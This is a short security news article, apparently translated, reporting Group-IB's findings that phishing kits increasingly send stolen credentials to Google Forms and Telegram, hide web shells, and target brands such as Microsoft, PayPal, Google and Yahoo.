Security researchers have noticed that hackers are increasingly using legitimate services, such as Google Forms and Telegram, to collect user data stolen from phishing sites. Email remains the preferred method of malicious agents to remove stolen information, but these channels underline a new trend in the evolution of phishing kits. Alternative data collection methods help cybercriminals keep their data "safe" and start using it immediately.
Analyzing phishing kits over the past year, cybersecurity researchers Group-IB noticed that most of these tools allow the collection of stolen user data through Google Forms and Telegram. These are considered alternative methods to obtain compromised data and represent almost 6% what Group-IB analysts found, a percentage that is likely to increase in the near future. Storing information in a local file in the phishing resource is also part of the alternative removal methods and represents the highest percentage of all.
The use of Telegram is not an unprecedented phenomenon, as hackers have turned to the service because they can maintain their anonymity, while it is an easy-to-use service.
A scam-as-a-service that has been used by at least 40 hacking gangs to forge popular classifieds has also relied on Telegram bots to provide fraudulent websites.
The stolen data collected from phishing sites in Google Forms is sent via POST request to an online form, the link of which is integrated in the phishing kit.
Group – IB told Bleeping Computer that compared to email, which can be blocked or compromised and logs lost, this is a safer way to retrieve information.
Another trend that the researchers noticed was that the creators of the phishing kits did double-dipping to increase their profits by adding code that copies the stolen data stream to their network host.
The Group-IB researchers also noticed that the creators of the phishing kits hid web shells in the code, which allows them to gain remote access to the resource.
As for the lures, the company identified more than 260 unique brands, most of which were for online services (30,7% - online tools for viewing documents, online shopping, streaming services and more), email clients (22,8%), and financial institutions (20%), which are the typical targets.
Product users Microsoft products, PayPal, Google and Yahoo were the top targets of these attacks, according to researchers.
Yaroslav Kargalev, Deputy Director of the Group-IB (CERT-GIB) Security Incident Response Team, said cybercriminals today use automation to replace blocked phishing sites faster. A direct consequence of this is the spread of the "more complex social engineering which is used in large-scale attacks ", says Kargalev, which demands the exclusion of the entire infrastructure of the attacker and not only the phishing sites.
Source of information: bleepingcomputer.com